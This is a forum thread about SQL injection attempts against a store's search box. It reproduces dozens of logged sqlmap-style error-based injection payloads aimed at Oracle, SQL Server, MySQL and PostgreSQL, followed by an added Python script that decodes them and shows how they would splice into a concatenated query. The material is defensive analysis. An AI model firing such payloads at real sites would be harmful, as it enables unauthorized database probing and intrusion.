SQL Injection in Store Search

This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
9 years ago
Hi Guys,

Since early morning today, we have been getting the following search queries from our stores. I understand it's SQL injection, and I have added a max length check and logic to detect SQL injection and prevent it from reaching the SQL server.

But I just wanted to know what the person searching is trying to understand/study. Is it safe to ignore?

The search terms are given below. "Enter Model Number or Cartridge Code" is the default text of our search box. The IP is supposed to be German.

Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170

Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP

Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF

Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd

Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo

Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU

Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys

Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658

Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502

Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ

Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN

Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167

Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)
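The search terms above are the error-based injection templates that sqlmap sends during fingerprinting: one shape each for Oracle (XMLType), Microsoft SQL Server (CONVERT(INT,...)), MySQL (the FLOOR(RAND(0)*2) GROUP BY trick) and PostgreSQL (CAST(... AS NUMERIC)), each repeated with a different break-out prefix (`'`, `')`, `)`, `%'` or none) because the scanner does not yet know which database is behind the store or how the application quotes the term. The CHR()/CHAR()/0x encodings keep literal quote characters out of the payload, and the five-letter `q...q` strings they decode to are boundary markers that let the tool pull the CASE result (1 or 0) out of the database error message. The script below is an added example, not code from this thread or from nopCommerce: it decodes four of the posted terms, names the DBMS each one targets, extracts the break-out prefix, the re-balancing tail and the markers, and shows what the SQL would look like if the term were concatenated into a LIKE pattern. The `Product` table and the `ASSUMED_QUERY` template are assumptions for illustration, not nopCommerce's query.

```python
"""Added example (not from the thread or from nopCommerce): decode sqlmap-style
error-based search terms, identify the DBMS and quoting context each probes, and
show how a term would splice into a concatenated LIKE query (assumed template)."""
import re

DEFAULT_TEXT = "Enter Model Number or Cartridge Code"

# Constructed sample: four of the search terms from the post, one per DBMS family.
SAMPLE_TERMS = [
    "Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='",
    "Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP",
    "Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='",
    "Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa",
]

# Each template only produces a usable error on one DBMS; all of them are sent
# because the scanner does not yet know which database backs the store.
DBMS_SIGNATURES = (
    ("Oracle", "XMLType("),                    # malformed XML name is echoed in the parse error
    ("Microsoft SQL Server", "CONVERT(INT,"),  # failed int conversion echoes the string
    ("MySQL", "FLOOR(RAND(0)*2)"),             # duplicate GROUP BY key error echoes the key
    ("PostgreSQL", "::text"),                  # invalid NUMERIC input error echoes the string
)

_CHR_RUN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*")   # Oracle / PostgreSQL concatenation
_CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*")  # SQL Server concatenation
_HEX_LIT = re.compile(r"0x([0-9a-fA-F]+)")                 # MySQL hex string literal
_NUM = re.compile(r"\d+")
_MARKER = re.compile(r"q[a-z]{3}q")  # five-letter boundary strings around the probed value
_SUFFIX = re.compile(r"(\s+AND\s+\(?'?[\w%]*'?\s*=\s*'?[\w%]*'?|--\s*\w+)$")


def dbms_of(term):
    """Name the database the template targets, or None if no known template matches."""
    for name, signature in DBMS_SIGNATURES:
        if signature in term:
            return name
    return None


def decode_strings(term):
    """Rebuild the text hidden behind CHR()/CHAR()/0x encodings (used to avoid quote characters)."""
    decoded = ["".join(chr(int(n)) for n in _NUM.findall(run))
               for run in _CHR_RUN.findall(term) + _CHAR_RUN.findall(term)]
    decoded += [bytes.fromhex(h).decode("ascii", "replace")
                for h in _HEX_LIT.findall(term) if len(h) % 2 == 0]
    return decoded


def markers(term):
    """The q...q pair that brackets the CASE result so the tool can regex it out of the error."""
    return tuple(m for s in decode_strings(term) for m in _MARKER.findall(s))


def injection_context(term):
    """Return (prefix, suffix): the characters that close the application's own quoting
    before the payload, and the tail that re-balances the statement after it."""
    rest = term[len(DEFAULT_TEXT):] if term.startswith(DEFAULT_TEXT) else term
    prefix = re.match(r"[')%]*", rest).group(0)
    m = _SUFFIX.search(rest)
    return prefix, (m.group(1).strip() if m else "")


# Assumed vulnerable query shape (not nopCommerce's): the term is pasted into a LIKE pattern.
ASSUMED_QUERY = "SELECT Id, Name FROM Product WHERE Name LIKE '%{term}%'"


def splice(term, query=ASSUMED_QUERY):
    """Show the SQL a string-concatenating application would actually send."""
    return query.replace("{term}", term)


def analyze(term):
    prefix, suffix = injection_context(term)
    return {
        "dbms": dbms_of(term),
        "prefix": prefix,
        "suffix": suffix,
        "markers": markers(term),
        # A well-formed probe adds an even number of quotes and as many '(' as ')',
        # so the application's own quoting and parentheses still pair up around it.
        "self_balanced": term.count("'") % 2 == 0 and term.count("(") == term.count(")"),
    }


if __name__ == "__main__":
    for term in SAMPLE_TERMS:
        info = analyze(term)
        print(f"{str(info['dbms']):<21} break-out={info['prefix']!r:6} "
              f"tail={info['suffix']!r:22} markers={info['markers']} balanced={info['self_balanced']}")
    print(splice(SAMPLE_TERMS[0]))
```

Running it prints one line per term and then the spliced Oracle query, whose tail reads `... AND '%'='%'`: the `'%'='` suffix exists purely to swallow the `%'` that a LIKE-based application would append, which is why every `%'`-prefixed variant ends the same way. The `')` and `)` variants likewise expect the application to wrap the value in parentheses. A max-length check stops these particular probes, but only parameterized queries remove the class of bug; if the search still builds SQL by concatenation anywhere, the same tool will find a shorter payload.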
9 years ago
Hi Jey,

No worries. nopCommerce is not vulnerable to SQL injection. Ignore these hack attempts.